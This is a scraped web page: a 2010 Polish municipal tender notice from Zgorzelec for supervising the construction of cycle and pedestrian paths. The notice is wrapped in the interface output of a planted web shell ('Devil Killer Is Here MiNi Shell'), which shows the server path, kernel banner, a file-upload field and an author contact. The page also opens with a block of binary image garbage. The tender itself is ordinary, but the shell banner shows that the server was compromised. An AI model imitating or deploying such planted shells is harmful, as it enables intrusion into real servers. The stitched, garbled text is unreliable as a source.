JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100414/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100414/84505-N-2010.html

<p class="kh_header"><b>Zgorzelec: Pełnienie nadzoru inwestorskiego dla zadania pod nazwą Wsparcie aktywnych form turystyki w mieście Zgorzelec poprzez budowę ścieżek pieszo-rowerowych</b><br>
<b>Numer ogłoszenia: 84505 - 2010; data zamieszczenia: 14.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego dla zadania pod nazwą Wsparcie aktywnych form turystyki w mieście Zgorzelec poprzez budowę ścieżek pieszo-rowerowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest pełnienie funkcji Inspektora Nadzoru Inwestorskiego w specjalności drogowej, nad wykonaniem robót budowlanych pod nazwą 
Wsparcie aktywnych form turystki w mieście Zgorzelec poprzez budowę ścieżek 
pieszo-rowerowych.
2. Zakres prac  obejmuje nadzór inwestorski nad budową ścieżek rowerowych w mieście Zgorzelec o następujących powierzchniach: 
1/ ścieżka o nawierzchni bitumicznej  o powierzchni 8.497m2 , 
2/ ścieżka o nawierzchni z kostki brukowej betonowej o powierzchni 5.162m2 , 
3/ miejsca odpoczynku w ilości 3 szt. (kostka brukowa betonowa) o powierzchni 36m2 , 
4/ utwardzone pobocza o powierzchni 5.927m2 , 
5/ zieleń - trawniki o powierzchni 600m2 .
3.  Szczegółowy zakres robót dla zadania objętego nadzorem inwestorskim został zawarty w dokumentacji projektowej składającej się z rysunków, szkiców, projektu 
zagospodarowania terenu,  przedmiaru  robót i  specyfikacji technicznej wykonania i 
odbioru robót budowlanych - załącznik nr 9 do SIWZ. 
4. W ramach pełnienia funkcji inspektora nadzoru do zadań Wykonawcy należy:
1)prowadzenie nadzoru budowlanego w oparciu o aktualne unormowania prawne wynikające z przepisów ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity z 2006r. Dz. U. Nr 156, poz. 1118 z póź. zm.),  
2)przekazanie Wykonawcy dziennika robót i weryfikowanie wpisów, 
3) przekazanie placu budowy, 
4)wydawanie na piśmie wszystkich poleceń Wykonawcy robót budowlanych, 
5)przekazanie Wykonawcy robót,  terenu budowy i współudział w przejmowaniu przez 
Wykonawcę terenów przejętych od poszczególnych właścicieli  na okres czasowy, 
6)współudział po zakończeniu robót budowlanych w przekazaniu użytkownikowi terenów przejętych na okres czasowy, 
7)przejecie, sprawdzenie i przekazanie wykonawcy punktów głównych geodezyjnych, 
8)przynajmniej jednokrotna w ciągu tygodnia obecność inspektora na terenie budowy, w okresie trwania budowy, a także na każde wezwanie Zamawiającego i Wykonawcy robót,      
9)rozwiązywanie bieżących problemów technicznych w trakcie realizacji zadania,
10)opiniowanie szczegółowych harmonogramów robót sporządzonych przez     
Wykonawcę,  
11)monitorowanie postępu prac poprzez porównywanie postępu faktycznego z    
zaaprobowanym harmonogramem robót, 
12)przed rozpoczęciem robót, upewnić się, że zostały spełnione wymagania dotyczące bezpieczeństwa ruchu (obejmujące też poruszanie się po terenie budowy) oraz, że prace budowlane zorganizowano z uwzględnieniem zasad bezpieczeństwa i ochrony zdrowia, 
13)wyegzekwowanie zabezpieczenia przeciw pożarowego na terenie budowy oraz     utrzymania ogólnego porządku na budowie, 
14)zapewnienie, aby były przestrzegane przedsięwzięcia dla ochrony środowiska w czasie budowy i po wykonaniu obiektów stałych, 
15)zatwierdzenie ewentualnych rysunków roboczych Wykonawcy robót i niezbędnych
korekt tych rysunków, 
16)zaopiniowanie przygotowanego przez Wykonawcę robót budowlanych projektu    
organizacji ruchu na czas budowy, 
17)zatwierdzenie rysunków zamiennych i uzupełniających wykonanych w ramach  
nadzoru autorskiego, 
18)opracowanie wniosków na roboty dodatkowe oraz przedstawienie ich do akceptacji Zamawiającemu, 
19)kontrola źródeł pozyskania materiałów oraz uprawnień i świadectw potwierdzających umiejętność personelu realizującego roboty np. obsługę maszyn, 
20)zatwierdzenie atestów i receptur przedstawionych przez Wykonawcę robót, 
21)przed wbudowaniem stosownych materiałów, sprawdzenie ich w zakresie 
dopuszczenia do stosowania w budownictwie zgodnie z wymogami określonymi w art. 
5 ustawy z dnia 16.04.2004r. o wyrobach budowlanych (Dz.U. Nr 92, poz. 881 z póź. 
zm), 
22)czuwanie nad jakością wykonywanych robót, 
23)wydawanie poleceń usuwania efektów robót wykonanych niewłaściwie lub poniżej 
standardu, 
24)kontrola jakości robót w zakresie zgodności z dokumentacją projektową normami
i specyfikacjami technicznymi, 
25)dokonywanie odbiorów robót zanikających i ulegających zakryciu, 
26)przygotowywanie dla Zamawiającego okresowych sprawozdań zawierających 
informacje dotyczące  ilości i zakresu realizowanych robót  oraz działalności nadzoru 
inwestorskiego w formie uzgodnionej z Zamawiającym, 
27)sporządzanie wspólnie z Wykonawcą robót budowlanych informacji o zmianach w 
realizacji robót, 
28)organizowanie, minimum raz w tygodniu, rad budowy dotyczących postępu robót  z udziałem Zamawiającego, Wykonawcy robót i Inspektora wraz ze sporządzeniem 
protokołu, 
29)prowadzenie dokumentacji i korespondencji z Zamawiającym i Wykonawcą, 
30)weryfikacja rysunków powykonawczych dostarczonych przez Wykonawcę robót, 
31)weryfikacja robót zinwentaryzowanych na geodezyjnych mapach powykonawczych, 
32)weryfikacja przygotowanych przez Wykonawcę dokumentów wymaganych do 
zgłoszenia zakończenia budowy do organu nadzoru budowlanego, 
33)organizacja oraz przeprowadzenie odbiorów częściowych, końcowego i ostatecznego tj. podjecie wszelkich niezbędnych czynności dla prawidłowego przeprowadzenia odbiorów, 
34)dokonywanie raz w roku,  przeglądu technicznego w okresie gwarancji, przy  
współudziale Wykonawcy i Zamawiającego.  Po wykryciu wad i usterek Inspektor 
nadzoruje ich usunięcie przez Wykonawcę oraz dokonuje odbioru po ich usunięciu, 
35)sprawdzenie harmonogramów rzeczowo finansowych rozliczenia kosztorysowego 
Wykonawcy, i ich rozliczenie, 
36)przygotowanie świadectw wykonania i przejęcia robót budowlanych, oraz elementów wbudowanych,
37)sporządzanie wniosków o naliczenie kar umownych, zgodnie z zapisami umowy o 
roboty  budowlane, 
38)dostarczenie Zamawiającemu dokumentów i informacji w terminach przez niego 
ustalonych, w przypadku sporów sądowych i innych wynikających z realizacji 
inwestycji, 
39)przygotowanie materiałów i udział w spotkaniach organizowanych przez 
Zamawiajacego z przedstawicielami mediów, 
40)prowadzenie  rozliczeń związanych z realizacją robót budowlanych zgodnie z 
wymogami RPO WD, 
41)współpraca przy opracowaniu sprawozdań oraz innej korespondencji zgodnie z 
wymogami RPO WD, w trakcie realizacji i po zakończeniu robót budowlanych,     
42)współpraca przy przygotowaniu danych, w zakresie:
a) wnioskowania Beneficjanta o płatności, 
b) okresowych i końcowych sprawozdań z realizacji projektu, 
c) innych informacji wymaganych przez instytucję zarządzającą, 
43)nadzorowanie kontraktu zgodnie z projektem umowy o dofinansowaniu zadania,       
44) Inspektor nie może podejmować decyzji, które wymagałyby zwiększenia 
nakładów finansowych przewidzianych w umowie z Wykonawcą robót. Jeżeli 
takie sytuacje  wystąpią, zwiększenie kosztów musi być zatwierdzone przez 
Zamawiającego. 
45) Zakres obowiązków Wykonawcy określa art. 25 i 26 Prawa Budowlanego (tekst 
jednolity z 2006r. Dz.U. Nr 156, poz. 1118). 
5. Zaleca się, aby Wykonawca dokonał oględzin terenu związanego z realizacją przedmiotu zamówienia, dokładnie zapoznał się z treścią dokumentów przetargowych, celem prawidłowego sporządzenia oferty oraz właściwego wykonania przedmiotu zamówienia.  
Wizję lokalną  Wykonawca dokona na   koszt własny..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 719.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Zamawiający żąda od wykonawców wniesienia wadium w wysokości 1 000,00 zł. PLN (słownie:  jeden tysiąc zł.)
2.  Wadium wnosi się przed upływem terminu składania ofert. 
3.  Wykonawca, który nie wniesie wadium do upływu terminu składania ofert, na 
     przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 
     3 ustawy Pzp, albo nie zgodzi się na przedłużenie okresu związania ofertą 
     zostanie wykluczony z postępowania o udzielenie zamówienia, a oferta 
     Wykonawcy wykluczonego zostanie odrzucona zgodnie z art. 24 ust. 2 pkt. 4 
     ustawy Pzp.
4.   W zależności od woli wykonawcy wadium może być wnoszone w następujących  
      formach:
1)	pieniądzu,
2)   poręczeniach bankowych lub poręczeniach spółdzielczej  kasy oszczędnościowo-
      kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)   gwarancjach bankowych,
4)   gwarancjach ubezpieczeniowych,
5)   poręczeniach udzielonych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2
      ustawy z dnia 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju 
      Przedsiębiorczości   (Dz.U. Nr 109, poz. 1158 z póź.zm.).
UWAGA!
Wadium wniesione w formach o których mowa w art. 45 ust. 6 pkt. 2-5 ustawy 
Pzp  musi gwarantować  Beneficjentowi zapłatę sumy gwarancyjnej jeżeli 
Wykonawca  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 
ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których  mowa w art. 25 
ust. 1, lub pełnomocnictw.  
5.  Zamawiający wymaga załączenia do oferty dokumentu potwierdzającego 
     wniesienie wadium do Zamawiającego.
6.  Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
     Zamawiającego Nr 35124012971111000025654013 Bank PEKAO S.A. I
     O/Zgorzelec.
     Na przelewie należy  umieścić informację :
     Wadium na Pełnienie nadzoru inwestorskiego dla zadania pod nazwą Wsparcie 
     aktywnych form turystyki w mieście Zgorzelec poprzez budowę ścieżek pieszo-
     rowerowych                  
7.  Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze
     najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem 
     wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z 
     zastrzeżeniem pkt. 12.    
8.  Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający 
     zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia 
     publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.  
9.  Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał 
     ofertę przed  upływem terminu składania ofert. 
10.Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu
     zwrócono wadium na podstawie art. 46 ust. 1 ustawy Pzp , jeżeli w wyniku 
     ostatecznego rozstrzygnięcia protestu jego oferta została wybrana jako 
     najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez 
     Zamawiającego. 
11.Jeżeli wadium wniesiono w pieniądzu, zamawiający zwróci je wraz z odsetkami
     wynikającymi z umowy rachunku bankowego, na którym było ono 
     przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz 
     prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez 
     wykonawcę .
12.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w 
     odpowiedzi  na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył 
     dokumentów lub oświadczeń,   o których mowa w art. 25 ust. 1 ustawy Pzp, 
     chyba że udowodni, ze wynika to z przyczyn należących po jego stronie. 
13. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego 
      oferta  została wybrana :
      a/ odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
          określonych w ofercie, 
      b/ nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
      c/ zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 
          przyczyn   leżących  po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z 
     metodą  spełnia/nie spełnia,  w oparciu o przedłożone przez Wykonawców 
    dokumenty i oświadczenia.  
2) Jako spełniający warunek udziału w postępowaniu zostaną ocenieni wykonawcy, 
    którzy wykażą wykonanie, usług pełnienia nadzoru inwestorskiego, nad 
    wykonaniem co najmniej dwóch robot budowlanych, polegających na budowie, 
    przebudowie lub remoncie dróg z nawierzchni bitumicznej i betonowej kostki 
    brukowej o łącznej wartości usług nie mniejszych niż 50 000,00 zł. Elementy 
    składowe tego warunku (budowa drogi z nawierzchni  bitumicznej
    i betonowej kostki brukowej) zostaną uznane za spełnione, jeżeli były 
    zrealizowane w jednym kontrakcie, jak również w dwóch osobnych kontraktach.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1/ Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z 
    metodą  spełnia/nie spełnia,  w oparciu o przedłożone przez Wykonawców 
    dokumenty i oświadczenia. 
2/ Jako spełniający warunek udziału w postępowaniu zostaną ocenieni Wykonawcy, 
    którzy   wykażą dysponowanie  minimum 1 osobą, która będzie pełnić funkcję 
    inspektora nadzoru, posiadającą prawo wykonywania samodzielnych funkcji 
    technicznych w budownictwie do kierowania robotami budowlanymi w specjalności 
    drogowej i załączą do oferty oświadczenie  o posiadaniu przez w/w osobę 
    uprawnień budowlanych w specjalności drogowej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty Wykonawca musi załączyć następujące dokumenty:   
1)  wypełniony i podpisany formularz Oferta (wg. załączonego wzoru), 
2)  informacja  na temat Wykonawcy (wg zał. wzoru ) - załącznik nr 1 do SIWZ  (w przypadku złożenia oferty wspólnej, dokument składa każdy z członków  konsorcjum), 
3) oświadczenie Wykonawcy z art. 36 ust. 4 ustawy z dnia 29.01.2004r. Prawo   zamówień   publicznych - załącznik nr 2 do SIWZ. 
W przypadku nie dołączenia do oferty powyższego załącznika, bądź jego nie wypełnienia, Zamawiający uzna, że Wykonawca wykona zamówienie własnymi siłami. 
Uwaga!
W przypadku kiedy Wykonawca będzie korzystał z wiedzy i doświadczenia innych  podmiotów, a nie załączy, bądź nie wypełni załącznika nr 2 do SIWZ do oferty,  Zamawiający nie będzie mógł uznać spełnienia warunku określonego w pkt. 11.1 pkt. 1 SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewidział możliwość dokonania zmian postanowień umowy,  przy czym warunki takiej zmiany Zamawiający określił  w § 8 projektu umowy. 
Zakres przewidzianych zmian: 
1) Termin określony w pkt. 4 SIWZ i § 2 ust.1 projektu umowy ulegnie  przesunięciu w przypadku rozwiązania umowy z Wykonawcą robót budowlanych. 
2) W przypadku skrócenia terminu realizacji robót budowlanych przewidzianego w
umowie z Wykonawcą  robót budowlanych, zmianie ulegnie harmonogram 
finansowy, o którym mowa w § 3 ust. 6 projektu  umowy, na podstawie którego 
ulegną zmianie terminy płatności, wartość faktur częściowych i faktury końcowej,
o której mowa w § 3 ust. 5 projektu umowy.  
3) Zmiana osób wskazanych w umowie z imienia i nazwiska odpowiedzialnych za 
realizację umowy, o których mowa w § 9 projektu umowy.
2. W przedstawionym w pkt. 1 podpunkt 1 przypadku  wystąpienia opóźnienia 
strony ustalą nowy termin realizacji, z tym że okres przesunięcia terminu realizacji 
przedmiotu zamówienia równy będzie co najmniej okresowi przerwy.  
3.  Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie 
powstałych okoliczności w formie opisowej i właściwie umotywowanej, 
potwierdzonej przez każdą ze stron umowy. 
4. Strona ubiegająca się o zmianę umowy w w/w przypadkach, winna zwrócić się do  
Wykonawcy/Zamawiającego w formie pisemnej z wnioskiem,  o wprowadzenie 
zmian  w umowie aneksem, w  terminie 7 dni od daty zaistniałej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgorzelec
Wydział Zamówień Publicznych
59-900 Zgorzelec ul. Domańskiego 6 pokój 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2010 godzina 11:00, miejsce: Urząd Miasta Zgorzelec
59-900 Zgorzelec
ul. Domańskiego 7
Punkt Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane jest ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com